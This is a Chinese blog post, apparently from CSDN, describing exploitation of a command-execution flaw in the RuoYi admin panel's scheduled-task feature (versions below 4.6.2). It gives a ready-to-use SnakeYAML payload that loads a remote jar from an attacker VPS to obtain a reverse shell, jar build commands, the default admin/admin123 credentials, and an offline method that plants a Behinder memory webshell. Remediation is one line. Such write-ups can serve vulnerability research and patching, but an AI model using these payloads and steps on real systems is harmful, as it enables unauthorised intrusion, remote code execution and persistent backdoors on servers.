记录一次若依后台定时任务命令执行漏洞(不出网利用)

最新推荐文章于 2024-05-27 16:11:39 发布
最新推荐文章于 2024-05-27 16:11:39 发布
阅读量4.7k 收藏 1
点赞数 2
文章标签: 网络安全 安全性测试 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42628854/article/details/134037984
版权

1.漏洞描述

由于若依后台计划任务处,对于传入的“调用目标字符串”没有任何校验,导致攻击者可以调用任意类、方法及参数触发反射执行命令。

2.影响版本

RuoYi<4.6.2。

3.漏洞详情

若依后台定时任务snakeyaml命令执行在此版本下大多是使用常见的出网利用,获取反弹shell。

(1)常规出网利用方式

payload:https://github.com/artsploit/yaml-payload

修改AwesomeScriptEngineFactory.java中命令为要执行的命令,类似开启计算器、ping、反弹shell等。

javac src/artsploit/AwesomeScriptEngineFactory.java

//编译为class文件。

jar -cvf yaml-payload.jar -C src/ .

//编译为jar文件

起一个vps上的web服务。

进入若依后台,添加一个计划任务。

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://VPS_IP:PORT/yaml-payload.jar"]]]]')

cron表达式:

0/10 * * * * ?

执行计划任务,获取反弹shell。

也可直接借助https://github.com/thelostworldFree/Ruoyi-All 若依一键利用工具。

(2)不出网利用方式

也不出网利用需要将恶意jar文件上传到服务器本地。

GitHub - thelostworldFree/Ruoyi-All: 若依后台定时任务一键利用

用这个工具一键穿,不过首先得有admin的用户密码,默认admin/admin123

上传jar包为java内存马,项目地址:GitHub - lz2y/yaml-payload-for-ruoyi: A memory shell for ruoyi

然后使用jdbc Template利用选择利用方法为snakeyaml,加载刚才上传的jar地址用来生成冰蝎内存马。

内存马验证:

冰蝎连接:

4.修复建议

(1)升级Ruoyi至最新版本。

福瑞二姨
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
若依框架漏洞(若依管理框架漏洞复现)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-28 4320
若依框架是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。若依框架漏洞默认口令漏洞早期若依框架漏洞版本有反序列化漏洞执行任意命令,漏洞复现,祭出fofa大法,fofa语法如下
(动态多)定时任务源码自动运行调度后台执行
04-10
1、spring 定时任务demo 2、定时任务(xxl-job)(XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。) 3、SpringCloudSchedule定时任务(使用mybatis读写mysql数据库, spring实现定时任务, 按照间隔时间或固定时间方式执行定时任务) 4、定时自动运行任务(在数据库中设置好定时时间,及运行的程序,及参数) 5、C#定时调度任务服务(Quartz.net做为任务调度核心,利用Log4Net做为日志输出,C#完成WINDOWS服务在后台定时执行任务) 6、android 后台定时执行任务 示例源码 7、C# Quatrz定时任务job实现 8、Quartz.NET定时任务框架实例(移植Quartz.Net定时任务框架,实现可配置的执行定时任务) 9、spring+quartz动态定时任务创建 +mybatis(包含quartz动态定时任务的) 10、C#实现的自定义定时任务 可定时运行 多任务运行 11、ETL定时任务(数据同步)(没有数据库,仅供参
渗透测试--实战若依ruoyi框架
qq_53003652的博客
11-16 4545
最近在挖某src的时候,碰到了一套若依,本以为啥都没有,结果随手一测若依存在的历史漏洞基本都有。是通过很奇怪的信息收集方式找到这个站的,分享出来让大家看看。老司机一看就明白了我在找什么,虽然说机会不大,但偏偏就让我遇到了。
一次攻防演练中的若依(thymeleaf 模板注入)getshell
最新发布
蚁景网安学院
05-27 721
一次攻防演练中幸运的从若依弱口令到后台getshell的过程和分析。首先,我会先把目标的二级域名拿去使用搜索引擎来搜索收集到包含这个目标二级域名的三级域名或者四级域名的站,这样可以快速的定位到你所要测试漏洞资产。
漏洞复现-Ruoyi若依系列
aming小老弟
05-02 2万+
官方漏洞历史文档。
若依系统前后台漏洞大全
热门推荐
FY10033的博客
08-07 4万+
漏洞影响范围RuoYi
从代码审计的角度分析 Ruoyi v4.7.6 的任意文件下载漏洞
新青年1号
05-26 3347
从代码审计的角度看 Ruoyi v4.7.6 任意文件下载漏洞
代码审计之若依系统
qq_50854662的博客
04-10 3365
代码审计之若依系统
若依漏洞利用方式总结
RisunJan的博客
01-14 3490
声明:此文所提供的信息只为网络安全人员对自己所负责的站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
关于为什么创建了若依定时任务却不执行的问题
weixin_43904135的博客
05-08 8156
本人使用的是若依vue分离版本v3.4.0 若依定时任务表是sys_job,添加定时任务时用的是这个方法 /** * 新增定时任务 */ @PreAuthorize("@ss.hasPermi('monitor:job:add')") @Log(title = "定时任务", businessType = BusinessType.INSERT) @PostMapping public AjaxResult add(@RequestBody Sys
若依后台管理系统 v4.1
09-29
"若依后台管理系统 v4.1"是一款专为Web应用程序设计的全面的后台管理系统。它源于作者对现有开源项目的不满意,希望通过自己的努力打造一个更符合个人需求的解决方案。这款系统在设计时考虑了易用性、灵活性和可扩展...
Linux下的crontab定时执行任务命令详解
09-15
Linux下的crontab定时执行任务命令详解 在Linux操作系统中,`crontab`是一个强大的定时任务调度器,用于在设定的时间间隔执行指定的命令或脚本。它依赖于名为`cron`的守护进程,该进程会在后台持续运行,按照预定义...
Java定时任务利用java Timer类实现定时执行任务的功能
09-01
Java定时任务利用java Timer类实现定时执行任务的功能】 在Java编程中,有时我们需要在特定的时间点或者按照预设的间隔执行某些任务,这就需要用到定时任务Java提供了`java.util.Timer`类来帮助我们实现这个...
CmsEasy language_admin.php 后台命令执行漏洞.md
04-08
CmsEasy language_admin.php 后台命令执行漏洞.md
若依框架定时任务配置自动注入注解不生效报java.lang.NullPointerException
rzx123456rzx的博客
09-27 1389
若依框架定时任务配置自动注入注解不生效报java.lang.NullPointerException
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2328
常用反弹shell技术汇总
若依前后端分离定时任务调用报错
weixin_45568265的博客
03-15 2536
一次若依前后端分离定时任务调用报错,自己给自己挖的坑 我使用若依前后端分离框架,觉得表多并整个系统没有用到定时任务,就把定时任务模块删除的,但是删除后又发现需要用到定时任务,就又加回来了,中间隔了很长时间,加回来后就怎么就调用不了,点进定时任务列表就报错,说没有这个路径404,各种百度,各种问,最后突然灵光一闪想起来maven没加 (。⊙౪⊙。)加上就好了, 若依删除定时任务模块 删除文件夹中的定时模块代码 sql文件中的quartz.sql不导入或者删除数据库中以qrtz为前缀的数据表 注释或
若依漏洞综合利用工具
Javachichi的博客
11-15 2497
内容概要:包括 内、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
实战Src对ruoyi框架管理系统漏洞的复现
zkaqlaoniao的博客
12-18 3863
在挖src的时候,搜搜有没有后台弱口令能进去的:发现一个弱口令进去后:【这个蓝色的草丛居然堪比算是ruoyi的指纹】看这界面,是不是很像ruoyi插件一看:前端vue.js加上登录的cookie rememberMe:【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架的管理系统了。
若依 定时任务 漏洞
10-02
若依定时任务漏洞是指在Ruoyi若依框架中的定时任务模块存在的安全漏洞。具体来说,该漏洞可能导致恶意用户通过构造特定的请求,执行任意命令或代码,从而对系统进行未授权的操作或获取敏感信息。 关于该漏洞的具体细节和利用过程,引用提供了一些相关信息。根据该引用,该漏洞涉及弱口令、后台RCE反射、YAML代码执行反射等方面。漏洞利用过程中可能会利用Thymeleaf注入的代码执行漏洞。 更多关于若依定时任务漏洞的信息可以在引用提供的链接中找到。 相应问题: 1. 若依定时任务漏洞是什么? 2. 如何利用若依定时任务漏洞进行攻击? 3. 若依团队是否已经修复了该漏洞? 4. 有没有防护措施来预防若依定时任务漏洞利用? 5. 若依定时任务漏洞对系统安全有什么潜在的影响?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值